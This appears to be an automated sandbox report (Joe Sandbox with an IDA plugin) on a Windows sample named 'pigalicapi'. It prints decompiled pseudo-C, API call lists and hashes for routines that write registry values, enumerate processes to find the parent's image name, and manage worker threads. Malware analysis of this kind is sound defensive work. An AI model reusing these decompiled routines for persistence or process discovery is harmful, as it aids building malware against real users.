                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                                                            0x007b5a07
                                                                                                                                                                                                                                                                            0x007b5a12
                                                                                                                                                                                                                                                                            0x007b5a35
                                                                                                                                                                                                                                                                            0x007b5a47
                                                                                                                                                                                                                                                                            0x007b5a5d
                                                                                                                                                                                                                                                                            0x007b5a6f
                                                                                                                                                                                                                                                                            0x007b5a77
                                                                                                                                                                                                                                                                            0x007b5a86
                                                                                                                                                                                                                                                                            0x007b5a8c
                                                                                                                                                                                                                                                                            0x007b5a97
                                                                                                                                                                                                                                                                            0x007b5aa1
                                                                                                                                                                                                                                                                            0x007b5ab9
                                                                                                                                                                                                                                                                            0x007b5ac8
                                                                                                                                                                                                                                                                            0x007b5ace
                                                                                                                                                                                                                                                                            0x007b5ad5
                                                                                                                                                                                                                                                                            0x007b5adc
                                                                                                                                                                                                                                                                            0x007b5b00
                                                                                                                                                                                                                                                                            0x007b5b08
                                                                                                                                                                                                                                                                            0x007b5b20
                                                                                                                                                                                                                                                                            0x007b5b31
                                                                                                                                                                                                                                                                            0x007b5b0a
                                                                                                                                                                                                                                                                            0x007b5b0e
                                                                                                                                                                                                                                                                            0x007b5b0e
                                                                                                                                                                                                                                                                            0x007b5b41
                                                                                                                                                                                                                                                                            0x007b5b41
                                                                                                                                                                                                                                                                            0x007b5ab9
                                                                                                                                                                                                                                                                            0x007b5a86
                                                                                                                                                                                                                                                                            0x007b5b4b

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(Qawoqmsckgkay,WDefault), ref: 007B5A47
                                                                                                                                                                                                                                                                              • Part of subcall function 007B5930: CharUpperA.USER32(00000000), ref: 007B59E2
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(007BC4E0), ref: 007B5A7D
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,007BC4E0), ref: 007B5A97
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B5AA1
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(Qawoqmsckgkay), ref: 007B5AAE
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(00000000,Qawoqmsckgkay), ref: 007B5AC8
                                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 007B5B00
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000), ref: 007B5B0E
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,software\microsoft\windows\currentversion\uninstall), ref: 007B5B31
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 007B5B3B
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$CharCloseCreateUpperlstrcat
                                                                                                                                                                                                                                                                            • String ID: Qawoqmsckgkay$WDefault$software\microsoft\windows\currentversion\uninstall
                                                                                                                                                                                                                                                                            • API String ID: 4161867159-3577274092
                                                                                                                                                                                                                                                                            • Opcode ID: 967160d283dd18cc5f67e4210dfa4b1c72839a7fa43d848058b4b8514de00e07
                                                                                                                                                                                                                                                                            • Instruction ID: e7315858e9c362a8b4e989861d174d9838dc456153bf0a87c4fe9b512a0a98f9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 967160d283dd18cc5f67e4210dfa4b1c72839a7fa43d848058b4b8514de00e07
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 433164B5600208FBDB15EFA4DC5AFEE3779AF84704F00C548FA15AB281D7B8A510CB64
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 789 7b1ca0-7b1cc3 CreateToolhelp32Snapshot 790 7b1cc9-7b1ce8 Process32First 789->790 791 7b1e51-7b1e57 789->791 792 7b1cee-7b1cfa GetCurrentProcessId 790->792 793 7b1e44-7b1e4b CloseHandle 790->793 794 7b1d04-7b1d10 792->794 793->791 795 7b1d12-7b1d1e 794->795 796 7b1d20-7b1d35 Process32Next 794->796 797 7b1d37-7b1d3e 795->797 796->794 796->797 797->793 798 7b1d44-7b1d59 Process32First 797->798 798->793 799 7b1d5f-7b1d6b 798->799 800 7b1e29-7b1e3e Process32Next 799->800 801 7b1d71-7b1d81 lstrlenA 799->801 800->793 800->799 802 7b1e27 801->802 803 7b1d87-7b1db9 lstrcpyA OpenProcess 801->803 802->793 803->802 804 7b1dbb-7b1de3 EnumProcessModules 803->804 805 7b1e02-7b1e11 GetProcessImageFileNameA 804->805 806 7b1de5-7b1e00 GetModuleFileNameExA 804->806 807 7b1e16-7b1e21 FindCloseChangeNotification 805->807 806->807 807->802
                                                                                                                                                                                                                                                                            C-Code - Quality: 71%
                                                                                                                                                                                                                                                                            			E007B1CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                                                            				long _v284;
                                                                                                                                                                                                                                                                            				intOrPtr _v300;
                                                                                                                                                                                                                                                                            				void* _v308;
                                                                                                                                                                                                                                                                            				void* _v312;
                                                                                                                                                                                                                                                                            				long _v316;
                                                                                                                                                                                                                                                                            				long _v320;
                                                                                                                                                                                                                                                                            				void* _v324;
                                                                                                                                                                                                                                                                            				char _v328;
                                                                                                                                                                                                                                                                            				int _v332;
                                                                                                                                                                                                                                                                            				void* _t44;
                                                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                                                            				void* _t61;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v5 = 0;
                                                                                                                                                                                                                                                                            				_t44 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                                                                                                            				_v312 = _t44;
                                                                                                                                                                                                                                                                            				if(_v312 == 0xffffffff) {
                                                                                                                                                                                                                                                                            					L18:
                                                                                                                                                                                                                                                                            					return _v5;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v308 = 0x128;
                                                                                                                                                                                                                                                                            				_t47 = Process32First(_v312,  &_v308); // executed
                                                                                                                                                                                                                                                                            				if(_t47 == 0) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					CloseHandle(_v312);
                                                                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v320 = GetCurrentProcessId();
                                                                                                                                                                                                                                                                            				_v316 = 0;
                                                                                                                                                                                                                                                                            				while(_v300 != _v320) {
                                                                                                                                                                                                                                                                            					if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                                                            					if(_v316 != 0 && Process32First(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                            						while(_v300 != _v316) {
                                                                                                                                                                                                                                                                            							if(Process32Next(_v312,  &_v308) != 0) {
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(lstrlenA( &_v272) < _a8) {
                                                                                                                                                                                                                                                                            							lstrcpyA(_a4,  &_v272);
                                                                                                                                                                                                                                                                            							_v324 = OpenProcess(0x410, 0, _v316);
                                                                                                                                                                                                                                                                            							if(_v324 != 0) {
                                                                                                                                                                                                                                                                            								_v332 = 0;
                                                                                                                                                                                                                                                                            								_push( &_v332);
                                                                                                                                                                                                                                                                            								_push(4);
                                                                                                                                                                                                                                                                            								_push( &_v328);
                                                                                                                                                                                                                                                                            								_t61 = _v324;
                                                                                                                                                                                                                                                                            								_push(_t61); // executed
                                                                                                                                                                                                                                                                            								L007BB1D4(); // executed
                                                                                                                                                                                                                                                                            								if(_t61 == 0) {
                                                                                                                                                                                                                                                                            									_push(_a8);
                                                                                                                                                                                                                                                                            									_push(_a4);
                                                                                                                                                                                                                                                                            									_push(_v324); // executed
                                                                                                                                                                                                                                                                            									L007BB1C8(); // executed
                                                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                                                            									_push(_a8);
                                                                                                                                                                                                                                                                            									_push(_a4);
                                                                                                                                                                                                                                                                            									_push(_v328);
                                                                                                                                                                                                                                                                            									_push(_v324);
                                                                                                                                                                                                                                                                            									L007BB1CE();
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v5 = 1;
                                                                                                                                                                                                                                                                            								FindCloseChangeNotification(_v324); // executed
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v316 = _v284;
                                                                                                                                                                                                                                                                            				goto L6;
                                                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                                                            0x007b1ca9
                                                                                                                                                                                                                                                                            0x007b1cb1
                                                                                                                                                                                                                                                                            0x007b1cb6
                                                                                                                                                                                                                                                                            0x007b1cc3
                                                                                                                                                                                                                                                                            0x007b1e51
                                                                                                                                                                                                                                                                            0x007b1e57
                                                                                                                                                                                                                                                                            0x007b1e57
                                                                                                                                                                                                                                                                            0x007b1cc9
                                                                                                                                                                                                                                                                            0x007b1ce1
                                                                                                                                                                                                                                                                            0x007b1ce8
                                                                                                                                                                                                                                                                            0x007b1e44
                                                                                                                                                                                                                                                                            0x007b1e4b
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1e4b
                                                                                                                                                                                                                                                                            0x007b1cf4
                                                                                                                                                                                                                                                                            0x007b1cfa
                                                                                                                                                                                                                                                                            0x007b1d04
                                                                                                                                                                                                                                                                            0x007b1d35
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1d37
                                                                                                                                                                                                                                                                            0x007b1d3e
                                                                                                                                                                                                                                                                            0x007b1d5f
                                                                                                                                                                                                                                                                            0x007b1e3e
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1e3e
                                                                                                                                                                                                                                                                            0x007b1d81
                                                                                                                                                                                                                                                                            0x007b1d92
                                                                                                                                                                                                                                                                            0x007b1dac
                                                                                                                                                                                                                                                                            0x007b1db9
                                                                                                                                                                                                                                                                            0x007b1dbb
                                                                                                                                                                                                                                                                            0x007b1dcb
                                                                                                                                                                                                                                                                            0x007b1dcc
                                                                                                                                                                                                                                                                            0x007b1dd4
                                                                                                                                                                                                                                                                            0x007b1dd5
                                                                                                                                                                                                                                                                            0x007b1ddb
                                                                                                                                                                                                                                                                            0x007b1ddc
                                                                                                                                                                                                                                                                            0x007b1de3
                                                                                                                                                                                                                                                                            0x007b1e05
                                                                                                                                                                                                                                                                            0x007b1e09
                                                                                                                                                                                                                                                                            0x007b1e10
                                                                                                                                                                                                                                                                            0x007b1e11
                                                                                                                                                                                                                                                                            0x007b1de5
                                                                                                                                                                                                                                                                            0x007b1de8
                                                                                                                                                                                                                                                                            0x007b1dec
                                                                                                                                                                                                                                                                            0x007b1df3
                                                                                                                                                                                                                                                                            0x007b1dfa
                                                                                                                                                                                                                                                                            0x007b1dfb
                                                                                                                                                                                                                                                                            0x007b1dfb
                                                                                                                                                                                                                                                                            0x007b1e16
                                                                                                                                                                                                                                                                            0x007b1e21
                                                                                                                                                                                                                                                                            0x007b1e21
                                                                                                                                                                                                                                                                            0x007b1db9
                                                                                                                                                                                                                                                                            0x007b1e27
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b1d3e
                                                                                                                                                                                                                                                                            0x007b1d18
                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B1CB1
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(000000FF,00000128), ref: 007B1CE1
                                                                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 007B1CEE
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32 ref: 007B1D2E
                                                                                                                                                                                                                                                                            • Process32First.KERNEL32(000000FF,00000128), ref: 007B1D52
                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,000000FF,00000128,000000FF,00000128), ref: 007B1D78
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(-00000204,?), ref: 007B1D92
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 007B1DA6
                                                                                                                                                                                                                                                                            • EnumProcessModules.PSAPI(00000000,?,00000004,00000000), ref: 007B1DDC
                                                                                                                                                                                                                                                                            • GetModuleFileNameExA.PSAPI(00000000,?,-00000204,007B575B,00000000,?,00000004,00000000), ref: 007B1DFB
                                                                                                                                                                                                                                                                            • GetProcessImageFileNameA.PSAPI(00000000,-00000204,007B575B,00000000,?,00000004,00000000), ref: 007B1E11
                                                                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,-00000204,007B575B,00000000,?,00000004,00000000), ref: 007B1E21
                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32 ref: 007B1E37
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007B1E4B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProcessProcess32$CloseFileFirstNameNext$ChangeCreateCurrentEnumFindHandleImageModuleModulesNotificationOpenSnapshotToolhelp32lstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 384183238-0
                                                                                                                                                                                                                                                                            • Opcode ID: 064e9f664882cdd3e6ee50810e46a945e8d1d362f51d2e6fab61342431a17094
                                                                                                                                                                                                                                                                            • Instruction ID: a68797bd3aea3b24fa8632afecf569d6b8d204d87993f490d358ae66b9f1f7b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 064e9f664882cdd3e6ee50810e46a945e8d1d362f51d2e6fab61342431a17094
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741E071900218DBCB25EB64CD95FEE77B9AB48301F5081D8E90DA7150D778AF84CF60
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5F30() {
                                                                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                                                                            				signed int _v9;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                                                            				int _v292;
                                                                                                                                                                                                                                                                            				char _v324;
                                                                                                                                                                                                                                                                            				int _v328;
                                                                                                                                                                                                                                                                            				char _t27;
                                                                                                                                                                                                                                                                            				CHAR* _t30;
                                                                                                                                                                                                                                                                            				long _t37;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v9 = 0;
                                                                                                                                                                                                                                                                            				_t27 =  *0x7c18a0; // 0x7c3b88
                                                                                                                                                                                                                                                                            				_v8 = _t27;
                                                                                                                                                                                                                                                                            				E007B7D20(_t27,  &_v284, 0, 0x104);
                                                                                                                                                                                                                                                                            				lstrcpyA( &_v284, "pigalicapi");
                                                                                                                                                                                                                                                                            				_t30 =  *0x7c1898; // 0x7c3fe2
                                                                                                                                                                                                                                                                            				lstrcatA( &_v284, _t30);
                                                                                                                                                                                                                                                                            				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                            				if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                                                            				_t10 =  &_v8; // 0x7b3c58
                                                                                                                                                                                                                                                                            				if(RegOpenKeyExA(_v16,  *_t10, 0, 0xf003f,  &_v20) == 0) {
                                                                                                                                                                                                                                                                            					_v292 = 0x20;
                                                                                                                                                                                                                                                                            					_v288 = 0x20;
                                                                                                                                                                                                                                                                            					_t37 = RegQueryValueExA(_v20,  &_v284, 0, 0,  &_v324,  &_v288); // executed
                                                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                                                            						_v9 = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t47 = _v9 & 0x000000ff;
                                                                                                                                                                                                                                                                            					if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_v328 = 0x10;
                                                                                                                                                                                                                                                                            						E007B9BD0(_t47,  &_v324, 0x10);
                                                                                                                                                                                                                                                                            						RegSetValueExA(_v20,  &_v284, 0, 3,  &_v324, 0x10);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					RegCloseKey(_v20);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v9;
                                                                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                                                                            0x007b5f39
                                                                                                                                                                                                                                                                            0x007b5f3d
                                                                                                                                                                                                                                                                            0x007b5f42
                                                                                                                                                                                                                                                                            0x007b5f53
                                                                                                                                                                                                                                                                            0x007b5f67
                                                                                                                                                                                                                                                                            0x007b5f6d
                                                                                                                                                                                                                                                                            0x007b5f7a
                                                                                                                                                                                                                                                                            0x007b5f80
                                                                                                                                                                                                                                                                            0x007b5f90
                                                                                                                                                                                                                                                                            0x007b5f92
                                                                                                                                                                                                                                                                            0x007b5f92
                                                                                                                                                                                                                                                                            0x007b5f99
                                                                                                                                                                                                                                                                            0x007b5fab
                                                                                                                                                                                                                                                                            0x007b5fbb
                                                                                                                                                                                                                                                                            0x007b5fc1
                                                                                                                                                                                                                                                                            0x007b5fcb
                                                                                                                                                                                                                                                                            0x007b5ff2
                                                                                                                                                                                                                                                                            0x007b5ffa
                                                                                                                                                                                                                                                                            0x007b5ffc
                                                                                                                                                                                                                                                                            0x007b5ffc
                                                                                                                                                                                                                                                                            0x007b6000
                                                                                                                                                                                                                                                                            0x007b6006
                                                                                                                                                                                                                                                                            0x007b6008
                                                                                                                                                                                                                                                                            0x007b601b
                                                                                                                                                                                                                                                                            0x007b603b
                                                                                                                                                                                                                                                                            0x007b603b
                                                                                                                                                                                                                                                                            0x007b6045
                                                                                                                                                                                                                                                                            0x007b6045
                                                                                                                                                                                                                                                                            0x007b6051

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(?,pigalicapi), ref: 007B5F67
                                                                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,007C3FE2), ref: 007B5F7A
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,X<{,00000000,000F003F,00000000), ref: 007B5FB3
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,?,00000000,00000000,?,00000020), ref: 007B5FF2
                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 007B603B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 007B6045
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Value$CloseOpenQuerylstrcatlstrcpy
                                                                                                                                                                                                                                                                            • String ID: $ $X<{$pigalicapi$?|
                                                                                                                                                                                                                                                                            • API String ID: 764223185-227907377
                                                                                                                                                                                                                                                                            • Opcode ID: 7b2724f36c330301991b83ad48a03d41a3eb1e726a3f21c29bb6b53f23e97680
                                                                                                                                                                                                                                                                            • Instruction ID: e3e081cf99b23a45bdce6106165dd919da2963f30fafe16c4c35443c9c2b3d9d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b2724f36c330301991b83ad48a03d41a3eb1e726a3f21c29bb6b53f23e97680
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C3152B190021CABDB15DB91DC56FFEB7B8AB48704F04C59CFB04A6181D7B95A44CFA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B4096() {
                                                                                                                                                                                                                                                                            				void _t92;
                                                                                                                                                                                                                                                                            				void* _t114;
                                                                                                                                                                                                                                                                            				void* _t161;
                                                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                                                            				void* _t166;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x38)) =  *((intOrPtr*)(_t161 - 0x38)) + 1;
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x38)) >=  *((intOrPtr*)(_t161 + 0x14))) {
                                                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                                                            					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_t171 =  *(_t161 - 0x34);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x34) != 0) {
                                                                                                                                                                                                                                                                            						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x34) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					ResetEvent( *(_t161 - 0x10));
                                                                                                                                                                                                                                                                            					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					_t92 = CreateThread(0, 0, E007B4AC0, _t161 - 0x34, 0, 0); // executed
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x34) = _t92;
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x64) = E007B97A0( ~(0 | _t171 > 0x00000000) |  *(_t161 + 0x18) * 0x00000004);
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x3c) =  *(_t161 - 0x64);
                                                                                                                                                                                                                                                                            					E007B7D20( *(_t161 - 0x64),  *(_t161 - 0x3c), 0,  *(_t161 + 0x18) << 2);
                                                                                                                                                                                                                                                                            					_t166 = _t163 + 0x10;
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x60) = 0;
                                                                                                                                                                                                                                                                            					L8:
                                                                                                                                                                                                                                                                            					while( *(_t161 - 0x60) <  *(_t161 + 0x18)) {
                                                                                                                                                                                                                                                                            						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = 0;
                                                                                                                                                                                                                                                                            						E007B7D20( *(_t161 - 0x3c), _t161 - 0x58, 0, 0x1c);
                                                                                                                                                                                                                                                                            						_t166 = _t166 + 0xc;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t161 - 0x40)) = _t161 - 0x34;
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t161 - 0x44)) =  *((intOrPtr*)(_t161 + 0x10));
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x58) =  *(_t161 + 8);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x50) =  *(_t161 - 0x60) *  *(_t161 - 8);
                                                                                                                                                                                                                                                                            						if( *(_t161 - 0x60) >=  *(_t161 + 0x18) - 1) {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t161 - 0x4c)) =  *((intOrPtr*)(_t161 + 0xc)) - 1;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t161 - 0x4c)) =  *(_t161 - 0x50) +  *(_t161 - 8) - 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x48) = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            						_t114 = CreateThread(0, 0, E007B4BA0, _t161 - 0x58, 0, 0); // executed
                                                                                                                                                                                                                                                                            						( *(_t161 - 0x3c))[ *(_t161 - 0x60)] = _t114;
                                                                                                                                                                                                                                                                            						WaitForSingleObject( *(_t161 - 0x48), 0xffffffff);
                                                                                                                                                                                                                                                                            						FindCloseChangeNotification( *(_t161 - 0x48)); // executed
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x60) =  *(_t161 - 0x60) + 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					WaitForMultipleObjects( *(_t161 + 0x18),  *(_t161 - 0x3c), 1, 0xffffffff);
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x10), 0x2710);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x5c)) == 0) {
                                                                                                                                                                                                                                                                            						 *(_t161 - 1) = 1;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					 *((intOrPtr*)(_t161 - 0x5c)) = WaitForSingleObject( *(_t161 - 0x34), 0x3e8);
                                                                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t161 - 0x5c)) != 0) {
                                                                                                                                                                                                                                                                            						TerminateThread( *(_t161 - 0x34), 0);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					EnterCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					if( *(_t161 - 0x30) != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree( *(_t161 - 0x30), 0, 0x8000);
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x30) = 0;
                                                                                                                                                                                                                                                                            						 *(_t161 - 0x2c) = 0;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                                                            					LeaveCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            					 *(_t161 - 0x68) =  *(_t161 - 0x3c);
                                                                                                                                                                                                                                                                            					E007B97C0( *(_t161 - 0x68));
                                                                                                                                                                                                                                                                            					if(( *(_t161 - 1) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						L21:
                                                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L22:
                                                                                                                                                                                                                                                                            				DeleteCriticalSection(_t161 - 0x28);
                                                                                                                                                                                                                                                                            				return  *(_t161 - 1);
                                                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                                                            0x007b4096
                                                                                                                                                                                                                                                                            0x007b4096
                                                                                                                                                                                                                                                                            0x007b4096
                                                                                                                                                                                                                                                                            0x007b409c
                                                                                                                                                                                                                                                                            0x007b40a5
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b40ab
                                                                                                                                                                                                                                                                            0x007b40af
                                                                                                                                                                                                                                                                            0x007b40b9
                                                                                                                                                                                                                                                                            0x007b40c6
                                                                                                                                                                                                                                                                            0x007b40cc
                                                                                                                                                                                                                                                                            0x007b40d3
                                                                                                                                                                                                                                                                            0x007b40d3
